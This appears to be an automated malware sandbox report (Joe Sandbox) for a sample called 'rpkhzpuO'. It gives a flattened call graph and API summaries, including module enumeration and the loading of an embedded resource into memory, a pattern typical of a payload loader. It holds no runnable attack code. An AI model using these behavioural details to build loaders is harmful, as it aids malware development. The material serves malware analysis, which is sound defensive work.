19267->19292 19272 4171e8 19268->19272 19268->19292 19269 4173fe 19269->19257 19278 40b6b5 __crtGetStringTypeA_stat 63 API calls 19269->19278 19270->19277 19271->19257 19274 417318 LCMapStringA 19271->19274 19276 4171f1 19272->19276 19281 41721a 19272->19281 19273 40b6b5 __crtGetStringTypeA_stat 63 API calls 19273->19269 19279 41733a 19274->19279 19274->19297 19275 4147ae __freea 63 API calls 19275->19257 19280 417203 LCMapStringW 19276->19280 19276->19292 19277->19257 19277->19267 19278->19257 19286 40b84d _malloc 63 API calls 19279->19286 19287 41734b _memset __crtGetStringTypeA_stat 19279->19287 19280->19292 19283 417235 __crtGetStringTypeA_stat 19281->19283 19288 40b84d _malloc 63 API calls 19281->19288 19282 417269 LCMapStringW 19284 417281 WideCharToMultiByte 19282->19284 19285 4172a3 19282->19285 19283->19282 19283->19292 19284->19285 19289 4147ae __freea 63 API calls 19285->19289 19286->19287 19290 417389 LCMapStringA 19287->19290 19287->19297 19288->19283 19289->19292 19293 4173a5 19290->19293 19294 4173a9 19290->19294 19292->19275 19296 4147ae __freea 63 API calls 19293->19296 19295 417a69 ___convertcp 70 API calls 19294->19295 19295->19293 19296->19297 19297->19269 19297->19273 19298->19164 19301 41358c 19299->19301 19300 41046e __encode_pointer 6 API calls 19300->19301 19301->19300 19302 4135a4 19301->19302 19302->18438 19306 40d281 19303->19306 19305 40d2ca 19305->18440 19307 40d28d __close 19306->19307 19314 40e806 19307->19314 19313 40d2ae __close 19313->19305 19315 40d6e0 __lock 63 API calls 19314->19315 19316 40d292 19315->19316 19317 40d196 19316->19317 19318 4104e9 __decode_pointer 6 API calls 19317->19318 19319 40d1aa 19318->19319 19320 4104e9 __decode_pointer 6 API calls 19319->19320 19321 40d1ba 19320->19321 19331 40d23d 19321->19331 19337 40e56a 19321->19337 19323 40d224 19324 41046e __encode_pointer 6 API calls 19323->19324 19326 40d232 19324->19326 19325 40d1d8 19325->19323 19327 40d1fc 19325->19327 19350 411d06 19325->19350 19328 41046e __encode_pointer 6 API calls 19326->19328 19330 411d06 __realloc_crt 73 API calls 19327->19330 19327->19331 19332 40d212 19327->19332 19328->19331 19330->19332 19334 40d2b7 19331->19334 19332->19331 19333 41046e __encode_pointer 6 API calls 19332->19333 19333->19323 19399 40e80f 19334->19399 19338 40e576 __close 19337->19338 19339 40e5a3 19338->19339 19340 40e586 19338->19340 19342 40e5e4 HeapSize 19339->19342 19344 40d6e0 __lock 63 API calls 19339->19344 19341 40bfc1 __wctomb_s_l 63 API calls 19340->19341 19343 40e58b 19341->19343 19346 40e59b __close 19342->19346 19345 40e744 __wctomb_s_l 6 API calls 19343->19345 19347 40e5b3 ___sbh_find_block 19344->19347 19345->19346 19346->19325 19355 40e604 19347->19355 19352 411d0f 19350->19352 19353 411d4e 19352->19353 19354 411d2f Sleep 19352->19354 19359 40e34f 19352->19359 19353->19327 19354->19352 19358 40d606 LeaveCriticalSection 19355->19358 19357 40e5df 19357->19342 19357->19346 19358->19357 19360 40e35b __close 19359->19360 19361 40e370 19360->19361 19362 40e362 19360->19362 19363 40e383 19361->19363 19364 40e377 19361->19364 19365 40b84d _malloc 63 API calls 19362->19365 19372 40e4f5 19363->19372 19381 40e390 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 19363->19381 19366 40b6b5 __crtGetStringTypeA_stat 63 API calls 19364->19366 19367 40e36a __close _realloc 19365->19367 19366->19367 19367->19352 19368 40e528 19369 40d2e3 _realloc 6 API calls 19368->19369 19373 40e52e 19369->19373 19370 40d6e0 __lock 63 API calls 19370->19381 19371 40e4fa HeapReAlloc 19371->19367 19371->19372 19372->19368 19372->19371 19374 40e54c 19372->19374 19376 40d2e3 _realloc 6 API calls 19372->19376 19378 40e542 19372->19378 19375 40bfc1 __wctomb_s_l 63 API calls 19373->19375 19374->19367 19377 40bfc1 __wctomb_s_l 63 API calls 19374->19377 19375->19367 19376->19372 19379 40e555 GetLastError 19377->19379 19382 40bfc1 __wctomb_s_l 63 API calls 19378->19382 19379->19367 19381->19367 19381->19368 19381->19370 19383 40e41b HeapAlloc 19381->19383 19385 40e470 HeapReAlloc 19381->19385 19386 40def2 ___sbh_alloc_block 5 API calls 19381->19386 19387 40e4db 19381->19387 19388 40d2e3 _realloc 6 API calls 19381->19388 19389 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 19381->19389 19391 40e4be 19381->19391 19395 40e493 19381->19395 19394 40e4c3 19382->19394 19383->19381 19384 40e4c8 GetLastError 19384->19367 19385->19381 19386->19381 19387->19367 19390 40bfc1 __wctomb_s_l 63 API calls 19387->19390 19388->19381 19389->19381 19392 40e4e8 19390->19392 19393 40bfc1 __wctomb_s_l 63 API calls 19391->19393 19392->19367 19392->19379 19393->19394 19394->19367 19394->19384 19398 40d606 LeaveCriticalSection 19395->19398 19397 40e49a 19397->19381 19398->19397 19402 40d606 LeaveCriticalSection 19399->19402 19401 40d2bc 19401->19313 19402->19401 19404 40b9aa __close _strnlen 19403->19404 19405 40b9b8 19404->19405 19409 40b9ec 19404->19409 19406 40bfc1 __wctomb_s_l 63 API calls 19405->19406 19407 40b9bd 19406->19407 19408 40e744 __wctomb_s_l 6 API calls 19407->19408 19413 40b9cd __close 19408->19413 19410 40d6e0 __lock 63 API calls 19409->19410 19411 40b9f3 19410->19411 19460 40b917 19411->19460 19413->18444 19417 4017cc ___crtGetEnvironmentStringsA 19416->19417 19417->18448 19420 40af70 19418->19420 19419 40b84d _malloc 63 API calls 19419->19420 19420->19419 19421 40af8a 19420->19421 19422 40d2e3 _realloc 6 API calls 19420->19422 19426 40af8c std::bad_alloc::bad_alloc 19420->19426 19421->18454 19422->19420 19423 40afb2 19674 40af49 19423->19674 19426->19423 19428 40d2bd __cinit 74 API calls 19426->19428 19428->19423 19429 40afca 19431 401903 lstrlenA 19430->19431 19432 4018fc 19430->19432 19686 4017e0 19431->19686 19432->18476 19435 401940 GetLastError 19437 40194b MultiByteToWideChar 19435->19437 19438 40198d 19435->19438 19436 401996 19436->18476 19439 4017e0 78 API calls 19437->19439 19438->19436 19702 401030 GetLastError 19438->19702 19440 401970 MultiByteToWideChar 19439->19440 19440->19438 19443 40af66 75 API calls 19442->19443 19444 40187c 19443->19444 19445 401885 SysAllocString 19444->19445 19446 4018a4 19444->19446 19445->19446 19446->18478 19448 40231a SafeArrayUnaccessData 19447->19448 19448->18485 19450 4019df VariantClear 19449->19450 19451 4019aa InterlockedDecrement 19449->19451 19450->18492 19451->19450 19452 4019b8 19451->19452 19452->19450 19453 4019c2 SysFreeString 19452->19453 19454 4019c9 19452->19454 19453->19454 19711 40aec0 19454->19711 19457 401571 19456->19457 19459 401582 19456->19459 19717 40afe0 19457->19717 19459->18456 19461 40b930 19460->19461 19462 40b92c 19460->19462 19461->19462 19464 40b942 _strlen 19461->19464 19469 40eeab 19461->19469 19466 40ba18 19462->19466 19464->19462 19479 40edfb 19464->19479 19673 40d606 LeaveCriticalSection 19466->19673 19468 40ba1f 19468->19413 19476 40ef2b 19469->19476 19477 40eec6 19469->19477 19470 40eecc WideCharToMultiByte 19470->19476 19470->19477 19471 411cba __calloc_crt 63 API calls 19471->19477 19472 40eeef WideCharToMultiByte 19473 40ef37 19472->19473 19472->19477 19474 40b6b5 __crtGetStringTypeA_stat 63 API calls 19473->19474 19474->19476 19476->19464 19477->19470 19477->19471 19477->19472 19477->19476 19478 40b6b5 __crtGetStringTypeA_stat 63 API calls 19477->19478 19482 414d44 19477->19482 19478->19477 19574 40ed0d 19479->19574 19483 414d76 19482->19483 19484 414d59 19482->19484 19485 414dd4 19483->19485 19528 417e7e 19483->19528 19486 40bfc1 __wctomb_s_l 63 API calls 19484->19486 19489 40bfc1 __wctomb_s_l 63 API calls 19485->19489 19488 414d5e 19486->19488 19490 40e744 __wctomb_s_l 6 API calls 19488->19490 19517 414d6e 19489->19517 19490->19517 19492 414db5 19494 414e12 19492->19494 19495 414de7 19492->19495 19496 414dcb 19492->19496 19494->19517 19539 414c98 19494->19539 19499 411c75 __malloc_crt 63 API calls 19495->19499 19495->19517 19500 40eeab ___wtomb_environ 120 API calls 19496->19500 19502 414df7 19499->19502 19503 414dd0 19500->19503 19501 414e8f 19505 414f7a 19501->19505 19509 414e98 19501->19509 19502->19494 19508 411c75 __malloc_crt 63 API calls 19502->19508 19502->19517 19503->19485 19503->19494 19504 414e41 19507 40b6b5 __crtGetStringTypeA_stat 63 API calls 19504->19507 19506 40b6b5 __crtGetStringTypeA_stat 63 API calls 19505->19506 19506->19517 19512 414e4b 19507->19512 19508->19494 19510 411d54 __recalloc_crt 74 API calls 19509->19510 19509->19517 19513 414e51 _strlen 19510->19513 19511 414f5e 19515 40b6b5 __crtGetStringTypeA_stat 63 API calls 19511->19515 19511->19517 19512->19513 19543 411d54 19512->19543 19513->19511 19516 411cba __calloc_crt 63 API calls 19513->19516 19513->19517 19515->19517 19518 414efb _strlen 19516->19518 19517->19477 19518->19511 19519 40ef42 _strcpy_s 63 API calls 19518->19519 19520 414f14 19519->19520 19521 414f28 SetEnvironmentVariableA 19520->19521 19522 40e61c __invoke_watson 10 API calls 19520->19522 19523 414f49 19521->19523 19524 414f52 19521->19524 19525 414f25 19522->19525 19526 40bfc1 __wctomb_s_l 63 API calls 19523->19526 19527 40b6b5 __crtGetStringTypeA_stat 63 API calls 19524->19527 19525->19521 19526->19524 19527->19511 19548 417dc2 19528->19548 19530 414d89 19530->19485 19530->19492 19531 414cea 19530->19531 19532 414cfb 19531->19532 19537 414d3b 19531->19537 19533 411cba __calloc_crt 63 API calls 19532->19533 19534 414d12 19533->19534 19535 40e79a __amsg_exit 63 API calls 19534->19535 19536 414d24 19534->19536 19535->19536 19536->19537 19555 417d6d 19536->19555 19537->19492 19542 414ca6 19539->19542 19540 414ccd 19540->19501 19540->19504 19541 40edfb __fassign 107 API calls 19541->19542 19542->19540 19542->19541 19546 411d5d 19543->19546 19545 411da0 19545->19513 19546->19545 19547 411d81 Sleep 19546->19547 19563 40b783 19546->19563 19547->19546 19549 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19548->19549 19550 417dd6 19549->19550 19551 40bfc1 __wctomb_s_l 63 API calls 19550->19551 19554 417df4 __mbschr_l 19550->19554 19552 417de4 19551->19552 19553 40e744 __wctomb_s_l 6 API calls 19552->19553 19553->19554 19554->19530 19556 417d7a 19555->19556 19557 417d7e _strlen 19555->19557 19556->19536 19558 40b84d _malloc 63 API calls 19557->19558 19559 417d91 19558->19559 19559->19556 19560 40ef42 _strcpy_s 63 API calls 19559->19560 19561 417da3 19560->19561 19561->19556 19562 40e61c __invoke_watson 10 API calls 19561->19562 19562->19556 19564 40b792 19563->19564 19565 40b7ba 19563->19565 19564->19565 19567 40b79e 19564->19567 19566 40b7cf 19565->19566 19568 40e56a __msize 64 API calls 19565->19568 19569 40e34f _realloc 72 API calls 19566->19569 19570 40bfc1 __wctomb_s_l 63 API calls 19567->19570 19568->19566 19573 40b7b3 _memset 19569->19573 19571 40b7a3 19570->19571 19572 40e744 __wctomb_s_l 6 API calls 19571->19572 19572->19573 19573->19546 19575 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19574->19575 19576 40ed21 19575->19576 19577 40ed42 19576->19577 19579 40ed75 19576->19579 19590 40ed2a 19576->19590 19578 40bfc1 __wctomb_s_l 63 API calls 19577->19578 19580 40ed47 19578->19580 19581 40ed99 19579->19581 19582 40ed7f 19579->19582 19585 40e744 __wctomb_s_l 6 API calls 19580->19585 19583 40eda1 19581->19583 19584 40edb5 19581->19584 19586 40bfc1 __wctomb_s_l 63 API calls 19582->19586 19592 414b9e 19583->19592 19612 414b5c 19584->19612 19585->19590 19589 40ed84 19586->19589 19591 40e744 __wctomb_s_l 6 API calls 19589->19591 19590->19464 19591->19590 19593 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19592->19593 19594 414bb2 19593->19594 19595 414bd3 19594->19595 19597 414c06 19594->19597 19607 414bbb 19594->19607 19596 40bfc1 __wctomb_s_l 63 API calls 19595->19596 19598 414bd8 19596->19598 19599 414c10 19597->19599 19600 414c2a 19597->19600 19603 40e744 __wctomb_s_l 6 API calls 19598->19603 19604 40bfc1 __wctomb_s_l 63 API calls 19599->19604 19601 414c34 19600->19601 19602 414c49 19600->19602 19617 417c1d 19601->19617 19606 414b5c ___crtCompareStringA 96 API calls 19602->19606 19603->19607 19608 414c15 19604->19608 19609 414c63 19606->19609 19607->19590 19610 40e744 __wctomb_s_l 6 API calls 19608->19610 19609->19607 19611 40bfc1 __wctomb_s_l 63 API calls 19609->19611 19610->19607 19611->19607 19613 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19612->19613 19614 414b6f 19613->19614 19633 4147ec 19614->19633 19618 417c33 19617->19618 19628 417c58 ___ascii_strnicmp 19617->19628 19619 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19618->19619 19620 417c3e 19619->19620 19621 417c43 19620->19621 19623 417c78 19620->19623 19622 40bfc1 __wctomb_s_l 63 API calls 19621->19622 19624 417c48 19622->19624 19625 417c82 19623->19625 19632 417caa 19623->19632 19626 40e744 __wctomb_s_l 6 API calls 19624->19626 19627 40bfc1 __wctomb_s_l 63 API calls 19625->19627 19626->19628 19630 417c87 19627->19630 19628->19607 19629 4168fc 98 API calls __tolower_l 19629->19632 19631 40e744 __wctomb_s_l 6 API calls 19630->19631 19631->19628 19632->19628 19632->19629 19634 414818 CompareStringW 19633->19634 19636 41482f strncnt 19633->19636 19635 41483b GetLastError 19634->19635 19634->19636 19635->19636 19638 414a95 19636->19638 19640 4148a4 19636->19640 19658 414881 19636->19658 19637 40ce09 __invoke_watson 5 API calls 19639 414b5a 19637->19639 19641 417a20 ___ansicp 87 API calls 19638->19641 19639->19590 19642 414962 MultiByteToWideChar 19640->19642 19645 4148e6 GetCPInfo 19640->19645 19640->19658 19644 414abb 19641->19644 19653 414982 19642->19653 19642->19658 19643 414b1c CompareStringA 19647 414b3a 19643->19647 19643->19658 19644->19643 19646 417a69 ___convertcp 70 API calls 19644->19646 19644->19658 19648 4148f7 19645->19648 19645->19658 19649 414ae0 19646->19649 19650 40b6b5 __crtGetStringTypeA_stat 63 API calls 19647->19650 19648->19642 19648->19658 19657 417a69 ___convertcp 70 API calls 19649->19657 19649->19658 19651 414b40 19650->19651 19654 40b6b5 __crtGetStringTypeA_stat 63 API calls 19651->19654 19652 4149d9 MultiByteToWideChar 19655 4149f2 MultiByteToWideChar 19652->19655 19656 414a83 19652->19656 19659 40b84d _malloc 63 API calls 19653->19659 19664 41499f __crtGetStringTypeA_stat 19653->19664 19654->19658 19655->19656 19667 414a09 19655->19667 19661 4147ae __freea 63 API calls 19656->19661 19660 414b01 19657->19660 19658->19637 19659->19664 19662 414b16 19660->19662 19663 414b0a 19660->19663 19661->19658 19662->19643 19665 40b6b5 __crtGetStringTypeA_stat 63 API calls 19663->19665 19664->19652 19664->19658 19665->19658 19666 414a53 MultiByteToWideChar 19668 414a66 CompareStringW 19666->19668 19669 414a7d 19666->19669 19670 414a1f __crtGetStringTypeA_stat 19667->19670 19671 40b84d _malloc 63 API calls 19667->19671 19668->19669 19672 4147ae __freea 63 API calls 19669->19672 19670->19656 19670->19666 19671->19670 19672->19656 19673->19468 19680 40d0f5 19674->19680 19677 40cd39 19678 40cd62 19677->19678 19679 40cd6e RaiseException 19677->19679 19678->19679 19679->19429 19681 40d115 _strlen 19680->19681 19685 40af59 19680->19685 19682 40b84d _malloc 63 API calls 19681->19682 19681->19685 19683 40d128 19682->19683 19684 40ef42 _strcpy_s 63 API calls 19683->19684 19683->19685 19684->19685 19685->19677 19687 4017f3 19686->19687 19688 4017e9 EntryPoint 19686->19688 19689 401805 19687->19689 19690 4017fb EntryPoint 19687->19690 19688->19687 19691 40180e EntryPoint 19689->19691 19692 401818 19689->19692 19690->19689 19691->19692 19693 40183e 19692->19693 19695 40b783 __recalloc 73 API calls 19692->19695 19699 401844 19692->19699 19696 40b6b5 __crtGetStringTypeA_stat 63 API calls 19693->19696 19700 40182d 19695->19700 19696->19699 19697 40186d MultiByteToWideChar 19697->19435 19697->19436 19698 40184e EntryPoint 19698->19699 19699->19697 19699->19698 19704 40b743 19699->19704 19700->19699 19701 401834 EntryPoint 19700->19701 19701->19693 19703 401044 EntryPoint 19702->19703 19705 40e231 __calloc_impl 63 API calls 19704->19705 19706 40b75d 19705->19706 19707 40b779 19706->19707 19708 40bfc1 __wctomb_s_l 63 API calls 19706->19708 19707->19699 19709 40b770 19708->19709 19709->19707 19710 40bfc1 __wctomb_s_l 63 API calls 19709->19710 19710->19707 19712 40b6b5 __close 19711->19712 19713 40b73d __close 19712->19713 19714 40b714 HeapFree 19712->19714 19713->19450 19714->19713 19715 40b727 19714->19715 19716 40bfc1 __wctomb_s_l 63 API calls 19715->19716 19716->19713 19718 40aff8 19717->19718 19719 40b01f __VEC_memcpy 19718->19719 19720 40b027 19718->19720 19719->19720 19720->19459 19722 40e8ea __close 19721->19722 19723 40d6e0 __lock 63 API calls 19722->19723 19724 40e8f1 19723->19724 19725 40e9ba __initterm 19724->19725 19726 40e91d 19724->19726 19740 40e9f5 19725->19740 19728 4104e9 __decode_pointer 6 API calls 19726->19728 19730 40e928 19728->19730 19731 40e9aa __initterm 19730->19731 19734 4104e9 __decode_pointer 6 API calls 19730->19734 19731->19725 19733 40e9f2 __close 19733->18497 19739 40e93d 19734->19739 19735 40e9e9 19736 40e7ee __mtinitlocknum 4 API calls 19735->19736 19736->19733 19737 4104e0 6 API calls __init_pointers 19737->19739 19738 4104e9 6 API calls __decode_pointer 19738->19739 19739->19731 19739->19737 19739->19738 19741 40e9fb 19740->19741 19743 40e9d6 19740->19743 19745 40d606 LeaveCriticalSection 19741->19745 19743->19733 19744 40d606 LeaveCriticalSection 19743->19744 19744->19735 19745->19743 18244 336b0bc4 18245 336b0bcd 18244->18245 18249 36cd205b 18245->18249 18255 36cd2060 18245->18255 18246 336b0be7 18250 36cd2060 18249->18250 18251 36cd21d7 GetActiveWindow 18250->18251 18252 36cd2205 18250->18252 18254 36cd22a5 18250->18254 18251->18252 18252->18254 18261 36cd1f9c 18252->18261 18254->18246 18256 36cd20c3 18255->18256 18257 36cd21d7 GetActiveWindow 18256->18257 18258 36cd2205 18256->18258 18259 36cd22a5 18256->18259 18257->18258 18258->18259 18260 36cd1f9c MessageBoxW 18258->18260 18259->18246 18260->18259 18262 36cd5958 MessageBoxW 18261->18262 18264 36cd59e4 18262->18264 18264->18254
                                                                                                                              APIs
                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                              • _getenv.LIBCMT ref: 00401ABA
                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                              • Module32First.KERNEL32 ref: 00401C48
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                              • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401DC4
                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                              • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                              • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                              • _malloc.LIBCMT ref: 00401EBA
                                                                                                                              • _memset.LIBCMT ref: 00401EDD
                                                                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                              • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                              • API String ID: 1430744539-2962942730
                                                                                                                              • Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                              • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                              • Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
                                                                                                                              • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                              APIs
                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                              • GetLastError.KERNEL32 ref: 00401940
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3322701435-0
                                                                                                                              • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                              • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                              • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                              • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 169 36cd369f-36cd372f GetCurrentProcess 173 36cd3738-36cd376c GetCurrentThread 169->173 174 36cd3731-36cd3737 169->174 175 36cd376e-36cd3774 173->175 176 36cd3775-36cd37a9 GetCurrentProcess 173->176 174->173 175->176 177 36cd37ab-36cd37b1 176->177 178 36cd37b2-36cd37cd call 36cd387d 176->178 177->178 182 36cd37d3-36cd3802 GetCurrentThreadId 178->182 183 36cd380b-36cd386d 182->183 184 36cd3804-36cd380a 182->184 184->183
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 36CD371E
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 36CD375B
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 36CD3798
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 36CD37F1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: feedec2852d7dfd70178d14166182306ac02af8596b003194fd41da71a4580b1
                                                                                                                              • Instruction ID: f7e938d5daa9863e71969419ed4b69c52aecbf4a722bd585ca816432c7eefdac
                                                                                                                              • Opcode Fuzzy Hash: feedec2852d7dfd70178d14166182306ac02af8596b003194fd41da71a4580b1
                                                                                                                              • Instruction Fuzzy Hash: 295166B4901649DFDB54CFAAC948BAEBBF1FF89300F248059E109B7360D7349946CB65

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 191 36cd36a0-36cd372f GetCurrentProcess 195 36cd3738-36cd376c GetCurrentThread 191->195 196 36cd3731-36cd3737 191->196 197 36cd376e-36cd3774 195->197 198 36cd3775-36cd37a9 GetCurrentProcess 195->198 196->195 197->198 199 36cd37ab-36cd37b1 198->199 200 36cd37b2-36cd37cd call 36cd387d 198->200 199->200 204 36cd37d3-36cd3802 GetCurrentThreadId 200->204 205 36cd380b-36cd386d 204->205 206 36cd3804-36cd380a 204->206 206->205
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 36CD371E
                                                                                                                              • GetCurrentThread.KERNEL32 ref: 36CD375B
                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 36CD3798
                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 36CD37F1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Current$ProcessThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2063062207-0
                                                                                                                              • Opcode ID: 16f5399b485fb98ee8b96105cb5f7be80f5be632231150aa716d0a327d177396
                                                                                                                              • Instruction ID: f7e938d5daa9863e71969419ed4b69c52aecbf4a722bd585ca816432c7eefdac
                                                                                                                              • Opcode Fuzzy Hash: 16f5399b485fb98ee8b96105cb5f7be80f5be632231150aa716d0a327d177396
                                                                                                                              • Instruction Fuzzy Hash: 295166B4901649DFDB54CFAAC948BAEBBF1FF89300F248059E109B7360D7349946CB65
                                                                                                                              APIs
                                                                                                                              • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1411284514-0
                                                                                                                              • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                              • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                              • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                              • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                              APIs
                                                                                                                              • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                                                                                                • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                                                                                                • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                                                                                                • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
